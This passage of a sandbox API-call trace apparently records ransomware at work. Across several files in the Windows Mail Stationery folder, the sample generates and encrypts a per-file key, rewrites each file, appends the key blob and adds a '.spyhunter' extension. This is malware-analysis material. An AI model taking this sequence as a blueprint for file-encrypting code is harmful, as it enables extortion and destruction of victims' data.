returned 97 [0143.972] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\shades of blue.htm"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\shades of blue.htm.spyhunter")) returned 1 [0143.972] GetProcessHeap () returned 0x2c0000 [0143.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0143.973] GetProcessHeap () returned 0x2c0000 [0143.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0143.973] GetProcessHeap () returned 0x2c0000 [0143.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3000ec0 | out: hHeap=0x2c0000) returned 1 [0143.973] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cef60 | out: pbBuffer=0x25cef60) returned 1 [0143.973] GetProcessHeap () returned 0x2c0000 [0143.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0143.973] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cef58*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cef58*=0x30) returned 1 [0143.973] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0143.979] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm") returned 78 [0143.979] StrStrW (lpFirst="Roses.htm", lpSrch=".txt") returned 0x0 [0143.979] GetProcessHeap () returned 0x2c0000 [0143.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0143.979] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cef1c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cef1c*=0xe9, lpOverlapped=0x0) returned 1 [0143.980] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff17, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.980] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xe9, lpNumberOfBytesWritten=0x25cef1c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cef1c*=0xe9, lpOverlapped=0x0) returned 1 [0143.980] GetProcessHeap () returned 0x2c0000 [0143.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0143.980] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.980] WriteFile (in: hFile=0x178, lpBuffer=0x25cef5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cef1c, lpOverlapped=0x0 | out: lpBuffer=0x25cef5c*, lpNumberOfBytesWritten=0x25cef1c*=0x4, lpOverlapped=0x0) returned 1 [0143.981] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cef1c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cef1c*=0x30, lpOverlapped=0x0) returned 1 [0143.981] CloseHandle (hObject=0x178) returned 1 [0143.981] GetProcessHeap () returned 0x2c0000 [0143.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0143.981] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm.spyhunter") returned 88 [0143.981] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.htm"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.htm.spyhunter")) returned 1 [0143.982] GetProcessHeap () returned 0x2c0000 [0143.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0143.982] GetProcessHeap () returned 0x2c0000 [0143.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0143.982] GetProcessHeap () returned 0x2c0000 [0143.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f32308 | out: hHeap=0x2c0000) returned 1 [0143.982] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cef58 | out: pbBuffer=0x25cef58) returned 1 [0143.982] GetProcessHeap () returned 0x2c0000 [0143.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0143.982] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cef50*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cef50*=0x30) returned 1 [0143.982] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0143.983] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg") returned 80 [0143.983] StrStrW (lpFirst="Peacock.jpg", lpSrch=".txt") returned 0x0 [0143.983] GetProcessHeap () returned 0x2c0000 [0143.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0143.983] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cef14, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cef14*=0x13fb, lpOverlapped=0x0) returned 1 [0144.069] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffec05, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0144.069] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x13fb, lpNumberOfBytesWritten=0x25cef14, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cef14*=0x13fb, lpOverlapped=0x0) returned 1 [0144.069] GetProcessHeap () returned 0x2c0000 [0144.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0144.070] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.070] WriteFile (in: hFile=0x178, lpBuffer=0x25cef54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cef14, lpOverlapped=0x0 | out: lpBuffer=0x25cef54*, lpNumberOfBytesWritten=0x25cef14*=0x4, lpOverlapped=0x0) returned 1 [0144.070] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cef14, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cef14*=0x30, lpOverlapped=0x0) returned 1 [0144.070] CloseHandle (hObject=0x178) returned 1 [0144.223] GetProcessHeap () returned 0x2c0000 [0144.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0144.223] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg.spyhunter") returned 90 [0144.223] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.jpg.spyhunter")) returned 1 [0144.224] GetProcessHeap () returned 0x2c0000 [0144.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0144.224] GetProcessHeap () returned 0x2c0000 [0144.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0144.224] GetProcessHeap () returned 0x2c0000 [0144.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f65988 | out: hHeap=0x2c0000) returned 1 [0144.224] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cef58 | out: pbBuffer=0x25cef58) returned 1 [0144.224] GetProcessHeap () returned 0x2c0000 [0144.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0144.225] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cef50*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cef50*=0x30) returned 1 [0144.225] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\orangecircles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0144.225] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg") returned 86 [0144.225] StrStrW (lpFirst="OrangeCircles.jpg", lpSrch=".txt") returned 0x0 [0144.225] GetProcessHeap () returned 0x2c0000 [0144.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0144.225] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cef14, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cef14*=0x18ed, lpOverlapped=0x0) returned 1 [0144.226] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffe713, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0144.226] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x18ed, lpNumberOfBytesWritten=0x25cef14, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cef14*=0x18ed, lpOverlapped=0x0) returned 1 [0144.227] GetProcessHeap () returned 0x2c0000 [0144.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0144.227] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.227] WriteFile (in: hFile=0xa0, lpBuffer=0x25cef54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cef14, lpOverlapped=0x0 | out: lpBuffer=0x25cef54*, lpNumberOfBytesWritten=0x25cef14*=0x4, lpOverlapped=0x0) returned 1 [0144.227] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cef14, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cef14*=0x30, lpOverlapped=0x0) returned 1 [0144.227] CloseHandle (hObject=0xa0) returned 1 [0144.227] GetProcessHeap () returned 0x2c0000 [0144.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0144.227] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg.spyhunter") returned 96 [0144.227] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\orangecircles.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\orangecircles.jpg.spyhunter")) returned 1 [0144.228] GetProcessHeap () returned 0x2c0000 [0144.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0144.228] GetProcessHeap () returned 0x2c0000 [0144.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0144.228] GetProcessHeap () returned 0x2c0000 [0144.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3000dc8 | out: hHeap=0x2c0000) returned 1 [0144.228] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cef50 | out: pbBuffer=0x25cef50) returned 1 [0144.228] GetProcessHeap () returned 0x2c0000 [0144.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0144.228] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cef48*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cef48*=0x30) returned 1 [0144.228] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\orange circles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0144.229] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm") returned 87 [0144.229] StrStrW (lpFirst="Orange Circles.htm", lpSrch=".txt") returned 0x0 [0144.229] GetProcessHeap () returned 0x2c0000 [0144.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0144.229] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cef0c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cef0c*=0xed, lpOverlapped=0x0) returned 1 [0144.230] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffff13, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0144.230] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x25cef0c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cef0c*=0xed, lpOverlapped=0x0) returned 1 [0144.230] GetProcessHeap () returned 0x2c0000 [0144.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0144.230] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.230] WriteFile (in: hFile=0xa0, lpBuffer=0x25cef4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cef0c, lpOverlapped=0x0 | out: lpBuffer=0x25cef4c*, lpNumberOfBytesWritten=0x25cef0c*=0x4, lpOverlapped=0x0) returned 1 [0144.230] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cef0c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cef0c*=0x30, lpOverlapped=0x0) returned 1 [0144.230] CloseHandle (hObject=0xa0) returned 1 [0144.230] GetProcessHeap () returned 0x2c0000 [0144.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0144.230] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm.spyhunter") returned 97 [0144.230] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\orange circles.htm"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\orange circles.htm.spyhunter")) returned 1 [0144.231] GetProcessHeap () returned 0x2c0000 [0144.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0144.231] GetProcessHeap () returned 0x2c0000 [0144.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0144.231] GetProcessHeap () returned 0x2c0000 [0144.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3000cd0 | out: hHeap=0x2c0000) returned 1 [0144.231] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cef50 | out: pbBuffer=0x25cef50) returned 1 [0144.231] GetProcessHeap () returned 0x2c0000 [0144.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0144.231] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cef48*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cef48*=0x30) returned 1 [0144.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\handprints.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0144.232] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg") returned 83 [0144.232] StrStrW (lpFirst="HandPrints.jpg", lpSrch=".txt") returned 0x0 [0144.232] GetProcessHeap () returned 0x2c0000 [0144.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0144.232] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cef0c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cef0c*=0x107e, lpOverlapped=0x0) returned 1 [0144.248] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffef82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0144.248] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x107e, lpNumberOfBytesWritten=0x25cef0c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cef0c*=0x107e, lpOverlapped=0x0) returned 1 [0144.249] GetProcessHeap () returned 0x2c0000 [0144.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0144.249] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.249] WriteFile (in: hFile=0xa0, lpBuffer=0x25cef4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cef0c, lpOverlapped=0x0 | out: lpBuffer=0x25cef4c*, lpNumberOfBytesWritten=0x25cef0c*=0x4, lpOverlapped=0x0) returned 1 [0144.249] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cef0c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cef0c*=0x30, lpOverlapped=0x0) returned 1 [0144.249] CloseHandle (hObject=0xa0) returned 1 [0144.249] GetProcessHeap () returned 0x2c0000 [0144.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0144.249] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg.spyhunter") returned 93 [0144.249] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\handprints.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\handprints.jpg.spyhunter")) returned 1 [0144.250] GetProcessHeap () returned 0x2c0000 [0144.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0144.250] GetProcessHeap () returned 0x2c0000 [0144.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0144.250] GetProcessHeap () returned 0x2c0000 [0144.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f65898 | out: hHeap=0x2c0000) returned 1 [0144.250] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cef48 | out: pbBuffer=0x25cef48) returned 1 [0144.250] GetProcessHeap () returned 0x2c0000 [0144.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0144.250] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cef40*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cef40*=0x30) returned 1 [0144.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0144.250] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm") returned 79 [0144.251] StrStrW (lpFirst="Garden.htm", lpSrch=".txt") returned 0x0 [0144.251] GetProcessHeap () returned 0x2c0000 [0144.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0144.251] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cef04, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cef04*=0xe7, lpOverlapped=0x0) returned 1 [0144.251] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffff19, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0144.251] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xe7, lpNumberOfBytesWritten=0x25cef04, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cef04*=0xe7, lpOverlapped=0x0) returned 1 [0144.252] GetProcessHeap () returned 0x2c0000 [0144.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0144.252] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.252] WriteFile (in: hFile=0xa0, lpBuffer=0x25cef44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cef04, lpOverlapped=0x0 | out: lpBuffer=0x25cef44*, lpNumberOfBytesWritten=0x25cef04*=0x4, lpOverlapped=0x0) returned 1 [0144.252] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cef04, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cef04*=0x30, lpOverlapped=0x0) returned 1 [0144.252] CloseHandle (hObject=0xa0) returned 1 [0144.252] GetProcessHeap () returned 0x2c0000 [0144.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0144.252] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm.spyhunter") returned 89 [0144.252] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.htm"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.htm.spyhunter")) returned 1 [0144.253] GetProcessHeap () returned 0x2c0000 [0144.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0144.253] GetProcessHeap () returned 0x2c0000 [0144.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0144.253] GetProcessHeap () returned 0x2c0000 [0144.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f32138 | out: hHeap=0x2c0000) returned 1 [0144.253] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cef48 | out: pbBuffer=0x25cef48) returned 1 [0144.253] GetProcessHeap () returned 0x2c0000 [0144.253] RtlAllocateHeap 